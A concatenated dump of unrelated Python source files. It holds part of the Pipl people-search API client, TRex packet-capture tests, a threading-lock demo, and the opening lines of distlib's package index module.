qps_live_allotted = int(headers.get('X-QPS-Live-Allotted'))
if 'X-QPS-Live-Current' in headers:
qps_live_current = int(headers.get('X-QPS-Live-Current'))
if 'X-QPS-Demo-Allotted' in headers:
qps_demo_allotted = int(headers.get('X-QPS-Demo-Allotted'))
if 'X-QPS-Demo-Current' in headers:
qps_demo_current = int(headers.get('X-QPS-Demo-Current'))
# Handle Demo usage allowance
if 'X-Demo-Usage-Allotted' in headers:
demo_usage_allotted = int(headers.get('X-Demo-Usage-Allotted'))
if 'X-Demo-Usage-Current' in headers:
demo_usage_current = int(headers.get('X-Demo-Usage-Current'))
if 'X-Demo-Usage-Expiry' in headers:
datetime_str = headers.get('X-Demo-Usage-Expiry')
demo_usage_expiry = datetime.datetime.strptime(datetime_str, time_format).replace(tzinfo=pytz.utc)
return (quota_allotted, quota_current, quota_reset, qps_allotted, qps_current, qps_live_allotted,
qps_live_current, qps_demo_allotted, qps_demo_current, demo_usage_allotted,
demo_usage_current, demo_usage_expiry)
def send_async(self, callback, strict_validation=True):
"""Same as send() but in a non-blocking way.
use this method if you want to send the request asynchronously so your
program can do other things while waiting for the response.
:param strict_validation: bool. Used by self.validate_query_params.
:param callback: Callable with the following signature - callback(response=None, error=None).
example:
>>> from piplapis.search import SearchAPIRequest
>>>
>>> def my_callback(response=None, error=None):
... print response or error
...
>>> request = SearchAPIRequest('samplekey', email='clark.kent@example.com')
>>> request.send_async(my_callback)
>>> do_other_things()
"""
def target():
try:
response = self.send(strict_validation)
callback(response=response)
except Exception as e:
callback(error=e)
threading.Thread(target=target).start()
def get_base_url(self):
protocol = "https" if self.use_https or (self.use_https is None and self.default_use_https) else "http"
return self.BASE_URL.format(protocol)
class SearchAPIResponse(Serializable):
"""a response from Pipl's Search API.
a response contains 4 main data elements:
- available data summary (piplapis.data.available_data.AvailableData).
This is a summary of the data available for your search. Please note that
some available data may not be present in the response due to data package limits.
The available data contains two sub-elements, basic and premium (if you're on premium,
basic will be None):
- basic: shows the data available with a basic coverage plan
- premium: shows the data available with a premium coverage plan
- a person (piplapis.data.containers.Person) that is the data object
representing all the information available for the person you were
looking for.
this object will only be returned when our identity-resolution engine is
convinced that the information is of the person represented by your query.
obviously, if the query was for "John Smith" there's no way for our
identity-resolution engine to know which of the hundreds of thousands of
people named John Smith you were referring to, therefore you can expect
that the response will not contain a person object.
on the other hand, if you search by a unique identifier such as email or
a combination of identifiers that only lead to one person, such as
"Clark Kent from Smallville, KS, US", you can expect to get
a response containing a single person object.
- a list of possible persons (piplapis.data.containers.Person). If our identity-resolution
engine did not find a definite match, you can use this list to further
drill down using the persons' search_pointer field.
- a list of sources (piplapis.data.containers.Source). Sources are the breakdown
of a response's data into its origin - so each source will contain data that came
from one source (e.g. a facebook profile, a public record, etc).
Sources may contain strictly data that belongs to the person returned as a
perfect match (only these are shown if the search contained show_sources=matching),
or they may belong to possibly related people. In any case, by default API
responses do not contain sources, and to use them you must pass a value for show_sources.
the response also contains the query as it was interpreted by Pipl. This
part is useful for verification and debugging, if some query parameters
were invalid you can see in response.query that they were ignored, you can
also see how the name/address from your query were parsed in case you
passed raw_name/raw_address in the query.
"""
def __init__(self, query=None, person=None, sources=None,
possible_persons=None, warnings_=None, http_status_code=None,
visible_sources=None, available_sources=None, search_id=None,
match_requirements=None, available_data=None, source_category_requirements=None,
persons_count=None, *args, **kwargs):
"""
:param query: A Person object with the query as interpreted by Pipl.
:param person: A Person object with data about the person in the query.
:param sources: A list of Source objects with full/partial match to the query.
:param possible_persons: A list of Person objects, each of these is an
expansion of the original query, giving additional
query parameters to zoom in on the right person.
:param warnings_: A list of unicodes. A warning is returned when the query
contains a non-critical error and the search can still run.
:param visible_sources: int, the number of sources in response
:param available_sources: int, the total number of known sources for this search
:param search_id: str or unicode, a unique ID which identifies this search. Useful for debugging.
:param available_data: an AvailableData object, showing the data available for your query.
:param match_requirements: str or unicode. Shows how Pipl interpreted your match_requirements criteria.
:param source_category_requirements: str or unicode. Shows how Pipl interpreted your
source_category_requirements criteria.
:param persons_count: int. The number of persons in this response.
"""
self.query = query
self.person = person
self.sources = sources or []
self.possible_persons = possible_persons or []
self.warnings = warnings_ or []
self.http_status_code = http_status_code
self.visible_sources = visible_sources
self.available_sources = available_sources
self.search_id = search_id
self.available_data = available_data
self.match_requirements = match_requirements
self.source_category_requirements = source_category_requirements
self.persons_count = persons_count
if not self.persons_count:
self.persons_count = 1 if self.person is not None else len(self.possible_persons)
self.raw_json = None
# Rate limiting data
self.qps_allotted = None # Your permitted queries per second
self.qps_current = None # The number of queries that you've run in the same second as this one.
self.qps_live_allotted = None # Your permitted queries per second
self.qps_live_current = None # The number of queries that you've run in the same second as this one.
self.qps_demo_allotted = None # Your permitted queries per second
self.qps_demo_current = None # The number of queries that you've run in the same second as this one.
self.quota_allotted = None # Your API quota
self.quota_current = None # The API quota used so far
self.quota_reset = None # The time when your quota resets
self.demo_usage_allotted = None # Your permitted demo queries
self.demo_usage_current = None # The number of demo queries that you've already run
self.demo_usage_expiry = None # The expiry time of your demo usage
@property
def matching_sources(self):
"""Sources that match the person from the query.
Note that the meaning of "match the person from the query" means "Pipl
is convinced that these sources hold data about the person you're
looking for".
Essentially, these are the sources that make up the Person object.
"""
return [source for source in self.sources if source.match == 1.]
def group_sources(self, key_function):
"""Return a dict with the sources grouped by the key returned by
`key_function`.
:param key_function: function, takes a source and returns the value from the source to
group by (see examples in the group_sources_by_* methods below).
:return dict, a key in this dict is a key returned by
`key_function` and the value is a list of all the sources with this key.
"""
sorted_sources = sorted(self.sources, key=key_function)
grouped_sources = itertools.groupby(sorted_sources, key=key_function)
return dict([(key, list(group)) for key, group in grouped_sources])
def group_sources_by_domain(self):
"""Return the sources grouped by the domain they came from.
:return dict, a key in this dict is a domain
and the value is a list of all the sources with this domain.
"""
key_function = lambda source: source.domain
return self.group_sources(key_function)
def group_sources_by_category(self):
"""Return the sources grouped by their category.
:return dict, a key in this dict is a category
and the value is a list of all the sources with this category.
"""
key_function = lambda source: source.category
return self.group_sources(key_function)
def group_sources_by_match(self):
"""Return the sources grouped by their match attribute.
:return dict, a key in this dict is a match
float and the value is a list of all the sources with this
match value.
"""
key_function = lambda source: source.match
return self.group_sources(key_function)
@classmethod
def from_json(cls, json_str):
"""
We override this method in SearchAPIResponse so that
:param json_str:
:return:
"""
d = json.loads(json_str)
obj = cls.from_dict(d)
obj.raw_json = json_str
return obj
@classmethod
def from_dict(cls, d):
"""Transform the dict to a response object and return the response.
:param d: the API response dictionary
"""
http_status_code = d.get('@http_status_code')
visible_sources = d.get('@visible_sources')
available_sources = d.get('@available_sources')
warnings_ = d.get('warnings', [])
search_id = d.get('@search_id')
persons_count = d.get('@persons_count')
match_requirements = d.get('match_requirements')
source_category_requirements = d.get('source_category_requirements')
available_data = d.get('available_data') or None
if available_data is not None:
available_data = AvailableData.from_dict(available_data)
query = d.get('query') or None
if query is not None:
query = Person.from_dict(query)
person = d.get('person') or None
if person is not None:
person = Person.from_dict(person)
sources = d.get('sources')
if sources:
sources = [Source.from_dict(source) for source in sources]
possible_persons = [Person.from_dict(x) for x in d.get('possible_persons', [])]
return cls(query=query, person=person, sources=sources,
possible_persons=possible_persons, warnings_=warnings_,
http_status_code=http_status_code, visible_sources=visible_sources,
available_sources=available_sources, search_id=search_id,
match_requirements=match_requirements, available_data=available_data,
source_category_requirements=source_category_requirements,
persons_count=persons_count)
def to_dict(self):
"""Return a dict representation of the response."""
d = {}
if self.http_status_code:
d['@http_status_code'] = self.http_status_code
if self.visible_sources:
d['@visible_sources'] = self.visible_sources
if self.available_sources:
d['@available_sources'] = self.available_sources
if self.search_id:
d['@search_id'] = self.search_id
if self.persons_count:
d['@persons_count'] = self.persons_count
if self.warnings:
d['warnings'] = self.warnings
if self.match_requirements:
d['match_requirements'] = self.match_requirements
if self.available_data is not None:
d['available_data'] = self.available_data.to_dict()
if self.query is not None:
d['query'] = self.query.to_dict()
if self.person is not None:
d['person'] = self.person.to_dict()
if self.sources:
d['sources'] = [source.to_dict() for source in self.sources]
if self.possible_persons:
d['possible_persons'] = [person.to_dict() for person in self.possible_persons]
return d
@property
def gender(self):
"""
A shortcut method to get the result's person's gender.
return Gender
"""
return self.person.gender if self.person else None
@property
def dob(self):
"""
A shortcut method to get the result's person's age.
return DOB
"""
return self.person.dob if self.person else None
@property
def job(self):
"""
A shortcut method to get the result's person's job.
return Job
"""
return self.person.jobs[0] if self.person and len(self.person.jobs) > 0 else None
@property
def address(self):
"""
A shortcut method to get the result's person's address.
return Address
"""
return self.person.addresses[0] if self.person and len(self.person.addresses) > 0 else None
@property
def education(self):
"""
A shortcut method to get the result's person's education.
return Education
"""
return self.person.educations[0] if self.person and len(self.person.educations) > 0 else None
@property
def language(self):
"""
A shortcut method to get the result's person's spoken language.
return Language
"""
return self.person.languages[0] if self.person and len(self.person.languages) > 0 else None
@property
def ethnicity(self):
"""
A shortcut method to get the result's person's ethnicity.
return Ethnicity
"""
return self.person.ethnicities[0] if self.person and len(self.person.ethnicities) > 0 else None
@property
def origin_country(self):
"""
A shortcut method to get the result's person's origin country.
return OriginCountry
"""
return self.person.origin_countries[0] if self.person and len(self.person.origin_countries) > 0 else None
@property
def phone(self):
"""
A shortcut method to get the result's person's phone.
return Phone
"""
return self.person.phones[0] if self.person and len(self.person.phones) > 0 else None
@property
def email(self):
"""
A shortcut method to get the result's person's email.
return Email
"""
return self.person.emails[0] if self.person and len(self.person.emails) > 0 else None
@property
def name(self):
"""
A shortcut method to get the result's person's name.
return Name
"""
return self.person.names[0] if self.person and len(self.person.names) > 0 else None
@property
def image(self):
"""
A shortcut method to get the result's person's image.
return Image
"""
return self.person.images[0] if self.person and len(self.person.images) > 0 else None
@property
def url(self):
"""
A shortcut method to get the result's person's url.
return URL
"""
return self.person.urls[0] if self.person and len(self.person.urls) > 0 else None
@property
def username(self):
"""
A shortcut method to get the result's person's username.
return Username
"""
return self.person.usernames[0] if self.person and len(self.person.usernames) > 0 else None
@property
def user_id(self):
"""
A shortcut method to get the result's person's user_id.
return UserID
"""
return self.person.user_ids[0] if self.person and len(self.person.user_ids) > 0 else None
@property
def relationship(self):
"""
A shortcut method to get the result's person's most prominent relationship.
return Relationship
"""
return self.person.relationships[0] if self.person and len(self.person.relationships) > 0 else None
def add_quota_throttle_data(self, *args, **kwargs):
logger.warn("SearchAPIResponse.add_quota_throttle_data is deprecated")
return self._add_rate_limiting_headers(*args, **kwargs)
def _add_rate_limiting_headers(self, quota_allotted=None, quota_current=None, quota_reset=None, qps_allotted=None,
qps_current=None, qps_live_allotted=None, qps_live_current=None, qps_demo_allotted=None,
qps_demo_current=None, demo_usage_allotted=None, demo_usage_current=None,
demo_usage_expiry=None):
self.qps_allotted = qps_allotted
self.qps_current = qps_current
self.qps_live_allotted = qps_live_allotted
self.qps_live_current = qps_live_current
self.qps_demo_allotted = qps_demo_allotted
self.qps_demo_current = qps_demo_current
self.quota_allotted = quota_allotted
self.quota_current = quota_current
self.quota_reset = quota_reset
self.demo_usage_allotted = demo_usage_allotted
self.demo_usage_current = demo_usage_current
self.demo_usage_expiry = demo_usage_expiry
class SearchAPIError(APIError):
"""an exception raised when the response from the search API contains an
error."""
pass
|
stl_capture_test.py
|
#!/router/bin/python
from .stl_general_test import CStlGeneral_Test, CTRexScenario
from trex_stl_lib.api import *
import os, sys
import pprint
import zmq
import threading
import time
import tempfile
import socket
from scapy.utils import RawPcapReader
from nose.tools import assert_raises, nottest
def ip2num (ip_str):
return struct.unpack('>L', socket.inet_pton(socket.AF_INET, ip_str))[0]
def num2ip (ip_num):
return socket.inet_ntoa(struct.pack('>L', ip_num))
def ip_add (ip_str, cnt):
return num2ip(ip2num(ip_str) + cnt)
class STLCapture_Test(CStlGeneral_Test):
"""Tests for capture packets"""
def setUp(self):
CStlGeneral_Test.setUp(self)
if not self.is_loopback:
self.skip('capture tests are skipped on a non-loopback machine')
if self.is_linux_stack:
self.skip('capture tests are skipped with linux-based stack')
self.c = CTRexScenario.stl_trex
self.tx_port, self.rx_port = CTRexScenario.ports_map['bi'][0]
self.c.connect()
self.c.reset(ports = [self.tx_port, self.rx_port])
self.pkt = STLPktBuilder(pkt = Ether()/IP(src="16.0.0.1",dst="48.0.0.1")/UDP(dport=12,sport=1025)/IP()/'a_payload_example')
self.percentage = 5 if self.is_virt_nics else 50
# some drivers (enic) might add VLAN always
driver = self.c.any_port.get_formatted_info()['driver']
self.nic_adds_vlan = driver in ['net_enic']
self.hostname = socket.gethostname()
@classmethod
def tearDownClass(cls):
if CTRexScenario.stl_init_error:
return
# connect back at end of tests
if not cls.is_connected():
CTRexScenario.stl_trex.connect()
def correct_bpf(self, bpf):
if self.nic_adds_vlan:
return '{0} or (vlan and {0})'.format(bpf)
return bpf
def __compare_captures (self, tx_pkt_list, rx_pkt_list):
# make sure we have the same binaries in both lists
tx_pkt_list_bin = {pkt['binary'] for pkt in tx_pkt_list}
rx_pkt_list_bin = {pkt['binary'] for pkt in rx_pkt_list}
if tx_pkt_list_bin != rx_pkt_list_bin:
# if the NIC does not add VLAN - a simple binary compare will do
if not self.nic_adds_vlan:
assert 0, "TX and RX captures do not match"
# the NIC adds VLAN - compare IP level
tx_pkt_list_ip = { bytes((Ether(pkt))['IP']) for pkt in tx_pkt_list_bin}
rx_pkt_list_ip = { bytes((Ether(pkt))['IP']) for pkt in rx_pkt_list_bin}
if tx_pkt_list_ip != rx_pkt_list_ip:
assert 0, "TX and RX captures do not match"
# a simple capture test - inject packets and see the packets arrived the same
def test_basic_capture (self):
pkt_count = 100
try:
# move to service mode
self.c.set_service_mode(ports = [self.tx_port, self.rx_port])
# start a capture
bpf = self.correct_bpf('ip and udp')
txc = self.c.start_capture(tx_ports = self.tx_port, limit = pkt_count, bpf_filter = bpf)
rxc = self.c.start_capture(rx_ports = self.rx_port, limit = pkt_count, bpf_filter = bpf)
# inject few packets with a VM
vm = STLScVmRaw( [STLVmFlowVar ( "ip_src", min_value="16.0.0.0", max_value="16.255.255.255", size=4, step = 7, op = "inc"),
STLVmWrFlowVar (fv_name="ip_src", pkt_offset= "IP.src"),
STLVmFixIpv4(offset = "IP")
]
);
pkt = STLPktBuilder(pkt = Ether()/IP(src="16.0.0.1",dst="48.0.0.1")/UDP(dport=12,sport=1025)/IP()/'a_payload_example',
vm = vm)
stream = STLStream(name = 'burst',
packet = pkt,
mode = STLTXSingleBurst(total_pkts = pkt_count,
percentage = self.percentage)
)
self.c.add_streams(ports = self.tx_port, streams = [stream])
self.c.start(ports = self.tx_port, force = True)
self.c.wait_on_traffic(ports = self.tx_port)
tx_pkt_list = []
self.c.stop_capture(txc['id'], output = tx_pkt_list)
with tempfile.NamedTemporaryFile() as rx_pcap:
with assert_raises(TRexError):
self.c.stop_capture(rxc['id'], output = '/tmp/asdfasdfqwerasdf/azasdfas') # should raise TRexError
self.c.stop_capture(rxc['id'], output = rx_pcap.name)
rx_pkt_list = [{'binary': pkt[0]} for pkt in RawPcapReader(rx_pcap.name)]
assert (len(tx_pkt_list) == len(rx_pkt_list) == pkt_count), 'Not equal: %s %s %s' % (len(tx_pkt_list), len(rx_pkt_list), pkt_count)
# make sure we have the same binaries in both lists
self.__compare_captures(tx_pkt_list, rx_pkt_list)
# generate all the values that should be
expected_src_ips = {ip_add('16.0.0.0', i * 7) for i in range(pkt_count)}
got_src_ips = {(Ether(pkt['binary']))['IP'].src for pkt in rx_pkt_list}
if expected_src_ips != got_src_ips:
assert 0, "recieved packets do not match expected packets"
except STLError as e:
assert False , '{0}'.format(e)
finally:
self.c.remove_all_captures()
self.c.set_service_mode(ports = self.rx_port, enabled = False)
# in this test we apply captures under traffic multiple times
def test_stress_capture (self):
pkts_limit = set([40, 70, 100])
try:
# move to service mode
self.c.set_service_mode(ports = self.rx_port)
# start heavy traffic
pkt = STLPktBuilder(pkt = Ether()/IP(src="16.0.0.1",dst="48.0.0.1")/UDP(dport=12,sport=1025)/IP()/'a_payload_example')
stream = STLStream(name = 'burst',
packet = pkt,
mode = STLTXCont(percentage = self.percentage)
)
self.c.add_streams(ports = self.tx_port, streams = [stream])
self.c.start(ports = self.tx_port, force = True)
captures = [{'capture_id': None, 'limit': pkts} for pkts in pkts_limit]
for i in range(0, 100):
# start a few captures
for capture in captures:
bpf = self.correct_bpf('ip and udp')
res = self.c.start_capture(rx_ports = [self.rx_port], limit = capture['limit'], bpf_filter = bpf)
capture['capture_id'] = res['id']
# a little time to wait for captures to be full
wait_iterations = 0
while True:
server_captures = self.c.get_capture_status()
counts = ([c['count'] for c in server_captures.values()])
if pkts_limit == set(counts):
break
time.sleep(0.1)
wait_iterations += 1
assert(wait_iterations <= 5)
for capture in captures:
capture_id = capture['capture_id']
# make sure the server registers us and we are full
assert(capture['capture_id'] in server_captures.keys())
assert(server_captures[capture_id]['count'] == capture['limit'])
# fetch packets
pkt_list = []
self.c.stop_capture(capture['capture_id'], pkt_list)
assert (len(pkt_list) == capture['limit'])
# a little sanity per packet
for pkt in pkt_list:
scapy_pkt = Ether(pkt['binary'])
assert(scapy_pkt['IP'].src == '16.0.0.1')
assert(scapy_pkt['IP'].dst == '48.0.0.1')
except STLError as e:
assert False , '{0}'.format(e)
finally:
self.c.remove_all_captures()
self.c.set_service_mode(ports = self.rx_port, enabled = False)
# in this test we capture and analyze the ARP request / response
def test_arp_capture (self):
if self.c.get_port_attr(self.tx_port)['layer_mode'] != 'IPv4':
return self.skip('skipping ARP capture test for non-ipv4 config on port {0}'.format(self.tx_port))
if self.c.get_port_attr(self.rx_port)['layer_mode'] != 'IPv4':
return self.skip('skipping ARP capture test for non-ipv4 config on port {0}'.format(self.rx_port))
try:
# move to service mode
self.c.set_service_mode(ports = [self.tx_port, self.rx_port])
bpf = self.correct_bpf('arp')
# start a capture
cap_info = self.c.start_capture(rx_ports = [self.tx_port, self.rx_port], limit = 2, bpf_filter = bpf)
# generate an ARP request
self.c.arp(ports = self.tx_port)
pkts = []
self.c.stop_capture(cap_info['id'], output = pkts)
assert len(pkts) == 2
# find the correct order
if pkts[0]['port'] == self.rx_port:
request = pkts[0]
response = pkts[1]
else:
request = pkts[1]
response = pkts[0]
assert request['port'] == self.rx_port
assert response['port'] == self.tx_port
arp_request, arp_response = Ether(request['binary']), Ether(response['binary'])
assert 'ARP' in arp_request
assert 'ARP' in arp_response
assert arp_request['ARP'].op == 1
assert arp_response['ARP'].op == 2
assert arp_request['ARP'].pdst == arp_response['ARP'].psrc
except STLError as e:
assert False , '{0}'.format(e)
finally:
self.c.remove_all_captures()
self.c.set_service_mode(ports = [self.tx_port, self.rx_port], enabled = False)
# test PING
def test_ping_capture (self):
if self.c.get_port_attr(self.tx_port)['layer_mode'] != 'IPv4':
return self.skip('skipping ARP capture test for non-ipv4 config on port {0}'.format(self.tx_port))
if self.c.get_port_attr(self.rx_port)['layer_mode'] != 'IPv4':
return self.skip('skipping ARP capture test for non-ipv4 config on port {0}'.format(self.rx_port))
try:
# move to service mode
self.c.set_service_mode(ports = [self.tx_port, self.rx_port])
# start a capture
bpf = self.correct_bpf('ip and icmp')
cap_info = self.c.start_capture(rx_ports = [self.tx_port, self.rx_port], limit = 100, bpf_filter = bpf)
# generate an ARP request
tx_ipv4 = self.c.get_port_attr(port = self.tx_port)['src_ipv4']
rx_ipv4 = self.c.get_port_attr(port = self.rx_port)['src_ipv4']
count = 50
self.c.ping_ip(src_port = self.tx_port, dst_ip = rx_ipv4, pkt_size = 1500, count = count, interval_sec = 0.01)
pkts = []
self.c.stop_capture(cap_info['id'], output = pkts)
req_pkts = [Ether(pkt['binary']) for pkt in pkts if pkt['port'] == self.rx_port]
res_pkts = [Ether(pkt['binary']) for pkt in pkts if pkt['port'] == self.tx_port]
assert len(req_pkts) == count
assert len(res_pkts) == count
for req_pkt in req_pkts:
assert 'ICMP' in req_pkt, req_pkt.command()
assert req_pkt['IP'].src == tx_ipv4
assert req_pkt['IP'].dst == rx_ipv4
assert req_pkt['ICMP'].type == 8
assert len(req_pkt) == 1500
for res_pkt in res_pkts:
assert 'ICMP' in res_pkt, res_pkt.command()
assert res_pkt['IP'].src == rx_ipv4
assert res_pkt['IP'].dst == tx_ipv4
assert res_pkt['ICMP'].type == 0
assert len(res_pkt) == 1500
except STLError as e:
assert False , '{0}'.format(e)
finally:
self.c.remove_all_captures()
self.c.set_service_mode(ports = [self.tx_port, self.rx_port], enabled = False)
# in this test we stress TX & RX captures in parallel
def test_stress_tx_rx (self):
pkt_count = 100
try:
# move to service mode
self.c.set_service_mode(ports = [self.rx_port, self.tx_port])
# start heavy traffic
pkt = STLPktBuilder(pkt = Ether()/IP(src="16.0.0.1",dst="48.0.0.1")/UDP(dport=12,sport=1025)/IP()/'a_payload_example')
stream = STLStream(name = 'burst',
packet = pkt,
mode = STLTXCont(percentage = self.percentage)
)
self.c.add_streams(ports = self.tx_port, streams = [stream])
self.c.start(ports = self.tx_port, mult = "50%", force = True)
# start a capture on the RX port
capture_rx = self.c.start_capture(rx_ports = self.rx_port, limit = 1000)
# now under traffic start/stop the TX capture
for i in range(0, 1000):
# start a common capture
capture_txrx = self.c.start_capture(rx_ports = self.rx_port, tx_ports = self.tx_port, limit = 1000)
self.c.stop_capture(capture_txrx['id'])
except STLError as e:
assert False , '{0}'.format(e)
finally:
self.c.remove_all_captures()
self.c.set_service_mode(ports = [self.rx_port, self.tx_port], enabled = False)
@staticmethod
def _poll_tcp_port(shared):
for i in range(20):
if shared['tcp_port']:
break
time.sleep(0.1)
assert shared['tcp_port']
return shared['tcp_port']
def _conf_zmq_socket (self,zmq_socket):
zmq_socket.setsockopt(zmq.RCVTIMEO, 1000)
zmq_socket.setsockopt(zmq.SNDTIMEO, 1000)
tcp_port = zmq_socket.bind_to_random_port('tcp://*')
return tcp_port
## disabled due to https://github.com/cisco-system-traffic-generator/trex-core/issues/715
def _test_tx_from_capture_port (self):
'''
test TX packets from the RX core using capture port mechanism.
'''
rx_capture_id = None
# use explicit values for easy comparsion
tx_src_mac = self.c.ports[self.tx_port].get_layer_cfg()['ether']['src']
tx_dst_mac = self.c.ports[self.tx_port].get_layer_cfg()['ether']['dst']
self.c.set_service_mode(ports = [self.tx_port, self.rx_port])
# Add ZeroMQ Socket
zmq_context = zmq.Context()
zmq_socket = zmq_context.socket(zmq.PAIR)
try:
tcp_port = self._conf_zmq_socket(zmq_socket)
max_capture_packet = 2000
bpf = self.correct_bpf('udp')
rx_capture_id = self.c.start_capture(rx_ports = self.rx_port, limit = max_capture_packet, bpf_filter = bpf)['id']
self.c.start_capture_port(port = self.tx_port, endpoint = 'tcp://%s:%s' % (self.hostname, tcp_port))
self.c.clear_stats()
nb_packets = 20000
assert max_capture_packet <= nb_packets
pkt = bytes(Ether(src=tx_src_mac,dst=tx_dst_mac)/IP()/UDP(sport = 100,dport=1000)/('x' * 100))
for _ in range(1,nb_packets):
zmq_socket.send(pkt)
stats = self.stl_trex.get_stats()
# check capture status with timeout
timeout = PassiveTimer(2)
while not timeout.has_expired():
caps = self.c.get_capture_status()
assert(len(caps) == 1)
if caps[rx_capture_id]['count'] == max_capture_packet:
break
time.sleep(0.1)
assert abs(max_capture_packet-caps[rx_capture_id]['count']) / max_capture_packet < 0.05
# RX capture
rx_pkts = []
self.c.stop_capture(rx_capture_id, output = rx_pkts)
rx_capture_id = None
rx_pkts = [x['binary'] for x in rx_pkts]
# RX pkts are not the same - loose check, all here and are UDP
assert abs(max_capture_packet-len(rx_pkts)) / max_capture_packet < 0.05
assert (all(['UDP' in Ether(x) for x in rx_pkts]))
# Report the number of pps we were able to send
print('Done, %6s TX pps' % (round(stats[self.rx_port]['rx_pps'],2)))
finally:
self.c.remove_all_captures()
self.c.stop_capture_port(port = self.tx_port)
self.c.set_service_mode(ports = [self.rx_port, self.tx_port], enabled = False)
zmq_context.destroy()
## disabled due to https://github.com/cisco-system-traffic-generator/trex-core/issues/715
def _test_rx_from_capture_port_with_filter(self):
'''
test RX packets from the RX core using capture port mechanism
and BPF filter on the port
'''
pkt_count = 10
try:
# move to service mode
self.c.set_service_mode(ports = self.rx_port)
# Start a thread to receive and count how many packet we receive
shared = {'tcp_port': 0, 'stop': False, 'failed': False}
def run():
# Add ZeroMQ Socket for RX Port
zmq_context = zmq.Context()
zmq_socket = zmq_context.socket(zmq.PAIR)
shared['tcp_port'] = self._conf_zmq_socket(zmq_socket)
nb_received = 0
first_packet = 0
try:
while not shared['stop']:
try:
pkt = zmq_socket.recv()
if not first_packet:
first_packet = time.time()
scapy_pkt = Ether(pkt)
assert(scapy_pkt['UDP'].dport == 1222)
nb_received += 1
if nb_received == pkt_count:
delta = time.time() - first_packet
print('Done (%ss), %6s RX pps' % (round(delta,2), round(nb_received/delta,2)))
return
except zmq.Again:
pass
finally:
time.sleep(0.01)
raise Exception('Did not get needed packets')
except Exception as e:
print('Expected packets: %s, received: %s' % (pkt_count, nb_received))
shared['failed'] = True
print('Error: %s' % e)
finally:
zmq_context.destroy()
t = threading.Thread(name="capture_port_thread", target=run)
t.daemon=True
t.start()
tcp_port = self._poll_tcp_port(shared)
# Start with wrong filter
self.c.start_capture_port(port = self.rx_port, endpoint = 'tcp://%s:%s' % (self.hostname, tcp_port), bpf_filter="ip host 18.0.0.1")
# should not let start if started
with assert_raises(TRexError):
self.c.start_capture_port(port = self.rx_port, endpoint = 'tcp://%s:%s' % (self.hostname, tcp_port))
# should not let disable service mode
with assert_raises(TRexError):
self.c.set_service_mode(ports = self.rx_port, enabled = False)
# Then change it
bpf = self.correct_bpf('udp port 1222')
self.c.set_capture_port_bpf_filter(port = self.rx_port, bpf_filter = bpf)
# start heavy traffic with wrong IP first
pkt = STLPktBuilder(pkt = Ether()/IP(src="16.0.0.1",dst="48.0.0.1")/UDP(dport=1222,sport=1025)/'a_payload_example')
stream = STLStream(name = 'burst',
packet = pkt,
mode = STLTXSingleBurst(pps = 10, total_pkts=pkt_count)
)
self.c.add_streams(ports = self.tx_port, streams = [stream])
# then start traffic with correct IP
pkt = STLPktBuilder(pkt = Ether()/IP(src="18.0.0.1",dst="48.0.0.1")/UDP(dport=12,sport=1025)/'a_payload_example')
stream = STLStream(name = 'burst2',
packet = pkt,
mode = STLTXSingleBurst(pps = 10, total_pkts=pkt_count)
)
self.c.add_streams(ports = self.tx_port, streams = [stream])
self.c.start(ports = self.tx_port, force = True)
# Wait until we have received everything
t.join(timeout=10)
if t.is_alive():
shared['stop'] = True
t.join(timeout=5)
raise Exception('Thread did not stop')
else:
assert not shared['failed']
finally:
self.c.remove_all_captures()
self.c.stop_capture_port(port = self.rx_port)
# should allow stop stopped
self.c.stop_capture_port(port = self.rx_port)
self.c.set_service_mode(ports = [self.rx_port], enabled = False)
self.c.stop()
## disabled due to https://github.com/cisco-system-traffic-generator/trex-core/issues/715
@nottest
def _test_capture_port_stress (self):
'''
test RX & Tx packets from the RX core using capture port mechanism
while start & stopping the capture port
'''
try:
# move to service mode
self.c.set_service_mode(ports = self.rx_port)
shared = {'tcp_port': 0, 'stop': False, 'failed': False}
# Start a thread to receive and send packets
def run_rx_tx():
# Add ZeroMQ Socket for RX Port
zmq_context = zmq.Context()
zmq_socket = zmq_context.socket(zmq.PAIR)
try:
shared['tcp_port'] = self._conf_zmq_socket(zmq_socket)
while not shared['stop']:
try:
pkt = zmq_socket.recv()
# Send it back
zmq_socket.send(pkt)
except zmq.Again:
pass
finally:
time.sleep(0.1)
finally:
zmq_context.destroy()
t = threading.Thread(name="capture_port_thread_rx", target=run_rx_tx)
t.daemon=True
t.start()
tcp_port = self._poll_tcp_port(shared)
# start heavy traffic
pkt = STLPktBuilder(pkt = Ether()/IP(src="16.0.0.1",dst="48.0.0.1")/UDP(dport=12,sport=1025)/'a_payload_example')
stream = STLStream(name = 'burst',
packet = pkt,
mode = STLTXCont(pps = 100000)
)
self.c.add_streams(ports = self.tx_port, streams = [stream])
self.c.start(ports = self.tx_port, force = True)
# Now start & stop the capture port while doing the work
for _ in range(5):
self.c.start_capture_port(port = self.rx_port, endpoint = 'tcp://%s:%s' % (self.hostname, tcp_port))
time.sleep(0.2)
self.c.stop_capture_port(port = self.rx_port)
time.sleep(0.2)
# Wait until thread dies
shared['stop'] = True
t.join(timeout=10)
assert not t.is_alive()
finally:
self.c.remove_all_captures()
self.c.stop()
self.c.set_service_mode(ports = [self.rx_port], enabled = False)
|
thread-lock.py
|
###
# Thread lock test.
#
# License - MIT.
###
import os
import threading
# Global var value.
tmp_value = 0
# change_value - Change global value.
def change_value(id):
# {
global tmp_value
tmp_value += id
print('id: %d, Value: %d' % (id, tmp_value))
# }
# thread_function - Thread test function.
def thread_function(lock, id):
# {
with lock:
for i in range(10):
change_value(id)
# }
# Main function.
def main():
# {
# Create thread lock.
lock = threading.Lock()
thrd1 = threading.Thread(target = thread_function, args = (lock, 1))
thrd2 = threading.Thread(target = thread_function, args = (lock, 2))
thrd1.start()
thrd2.start()
thrd1.join()
thrd2.join()
print('The end, tmp_value: %d.' % tmp_value)
# }
# Program entry.
if '__main__' == __name__:
main()
|
index.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import hashlib
import logging
import os
import shutil
import subprocess
import tempfile
try:
from threading import Thread
except ImportError:
from dummy_threading import Thread
from . import DistlibException
from .compat import (HTTPBasicAuthHandler, Request, HTTPPasswordMgr,
urlparse, build_opener, string_types)
from .util import cached_property, zip_dir, ServerProxy
logger = logging.getLogger(__name__)
DEFAULT_INDEX = 'https://pypi.org/pypi'
DEFAULT_REALM = 'pypi'
class PackageIndex(object):
"""
This class represents a package index compatible with PyPI, the Python
Package Index.
"""
